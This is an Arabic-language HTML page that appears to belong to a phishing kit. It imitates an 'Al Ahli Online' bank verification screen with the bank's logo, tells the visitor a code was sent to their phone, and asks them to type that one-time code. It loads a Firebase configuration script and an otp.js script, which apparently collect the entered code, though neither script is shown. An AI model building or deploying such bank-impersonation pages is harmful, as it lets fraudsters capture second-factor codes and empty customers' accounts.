
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
  <meta charset="UTF-8">
  <title>رمز التحقق - الأهلي أونلاين</title>
  <link rel="stylesheet" href="style.css">
</head>
<body>
  <div class="container">
    <img src="logo.png" alt="شعار البنك الأهلي" class="logo" />
    <h2>تم إرسال رمز إلى رقمك</h2>
    <form id="otpForm">
      <input type="text" placeholder="أدخل رمز التحقق" id="otp" required><br>
      <button type="submit">تحقق</button>
    </form>
  </div>
  <script src="firebase-config.js"></script>
  <script src="otp.js"></script>
</body>
</html>
